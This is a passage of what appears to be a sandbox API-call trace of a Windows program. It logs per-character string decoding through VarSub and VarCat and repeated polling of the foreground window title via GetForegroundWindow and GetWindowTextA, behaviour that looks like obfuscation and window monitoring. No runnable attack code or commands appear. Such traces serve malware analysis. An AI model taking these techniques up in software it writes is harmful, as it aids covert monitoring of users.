lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.235] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.236] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.236] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.236] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.242] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.242] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.242] GetForegroundWindow () returned 0x102c2 [0086.242] GetLastError () returned 0x0 [0086.243] SysStringLen (param_1=" ") returned 0xff [0086.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.243] SysStringLen (param_1=" ") returned 0xff [0086.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.243] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.243] GetLastError () returned 0x0 [0086.243] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.243] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.244] SysStringLen (param_1="Act") returned 0x3 [0086.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0xe4a94c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0086.244] SetWindowTextA (hWnd=0x2036e, lpString="Act") returned 1 [0086.244] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0086.244] GetFocus () returned 0x0 [0086.244] lstrlenA (lpString="Act") returned 3 [0086.244] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0086.245] IsWindow (hWnd=0x2036e) returned 1 [0086.245] IsWindow (hWnd=0x2036e) returned 1 [0086.245] IsWindow (hWnd=0x2036e) returned 1 [0086.245] IsWindow (hWnd=0x2036e) returned 1 [0086.245] GetFocus () returned 0x0 [0086.246] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.246] GetFocus () returned 0x0 [0086.246] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x4) returned 0x310bcd0 [0086.246] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x4, lParam=0x310bcd0) returned 0x3 [0086.246] GetFocus () returned 0x0 [0086.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0086.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0xe4a94c, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0086.246] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.246] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0086.247] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0086.247] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0086.248] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0086.248] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0086.249] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0086.249] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q", lpUsedDefaultChar=0x0) returned 1 [0086.249] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0086.250] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0086.250] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0086.250] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0086.251] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0086.251] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.252] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.252] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.253] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.253] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.253] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.254] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.254] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.255] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.255] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.255] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.256] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.256] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.257] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.257] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.257] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.258] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.258] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.258] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.259] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.259] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.260] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.260] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.260] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.260] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.261] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.261] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.261] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.261] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.262] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.262] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.262] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.262] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.263] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.263] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.263] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.264] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.264] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.264] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.265] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.265] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.265] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.265] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.265] GetForegroundWindow () returned 0x10080 [0086.266] GetLastError () returned 0x0 [0086.266] SysStringLen (param_1=" ") returned 0xff [0086.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.266] SysStringLen (param_1=" ") returned 0xff [0086.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.266] GetWindowTextA (in: hWnd=0x10080, lpString=0xe577bc, nMaxCount=255 | out: lpString="") returned 0 [0086.266] GetLastError () returned 0x0 [0086.344] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.344] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="") returned 256 [0086.344] SysStringLen (param_1="") returned 0x1 [0086.344] WideCharToMultiByte (in: 